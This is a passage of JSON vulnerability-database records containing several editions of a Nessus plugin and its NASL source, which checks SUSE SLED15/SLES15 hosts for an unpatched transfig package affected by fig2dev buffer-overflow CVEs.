"CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:45:44", "differentElements": ["cpe"], "edition": 3}, {"bulletin": {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "6fb10e121874d0d68b286f30db88cc4a", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-19797", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1143650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "http://www.nessus.org/u?9dd79152", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1161698", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-14275"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-06T13:20:47", "history": [], "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FEDORA_2020-6A2824178E.NASL", "OPENSUSE-2020-1843.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "AL2_ALAS-2020-1398.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1702.NASL", "DEBIAN_DLA-2073.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19746"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19797", "UB:CVE-2019-19746", "UB:CVE-2021-3561", "UB:CVE-2019-14275", "UB:CVE-2019-19555"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-19555", "RH:CVE-2019-19797", "RH:CVE-2019-14275"]}, {"type": "fedora", "idList": ["FEDORA:B794B627F4F0", "FEDORA:983DF624CFF6", "FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877392"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-06T13:20:47", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-06T13:20:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:transfig", "cpe:/o:novell:suse_linux:15"], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:20:47", "differentElements": ["modified", "sourceData"], "edition": 4}, {"bulletin": {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "765a57561396741adbee6eac4cb29ca8", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-08-09T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159130", "http://www.nessus.org/u?9dd79152", "https://www.suse.com/security/cve/CVE-2019-19797", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://bugzilla.suse.com/1143650", "https://www.suse.com/security/cve/CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-14275"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-11T13:09:35", "history": [], "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-6A2824178E.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "DEBIAN_DLA-2073.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1843.NASL", "FEDORA_2020-5D0F0593AE.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-19746"]}, {"type": "cve", "idList": ["CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-14275"]}, {"type": "fedora", "idList": ["FEDORA:E540F6253477", "FEDORA:9C4BF3072F18", "FEDORA:73FB862622DB", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:983DF624CFF6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877392"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-11T13:09:35", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-08-11T13:09:35", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/09\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:transfig", "cpe:/o:novell:suse_linux:15"], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T13:09:35", "differentElements": ["nessusSeverity"], "edition": 5}], "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-14823-1.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "SUSE_SU-2020-1806-1.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-3124-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2019-19746"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2019-19555", "RH:CVE-2019-19797"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275", "CVE-2019-19555", "CVE-2021-3561"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-08-19T11:57:55", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-08-19T11:57:55", "rev": 2}}, "objectVersion": "1.6", 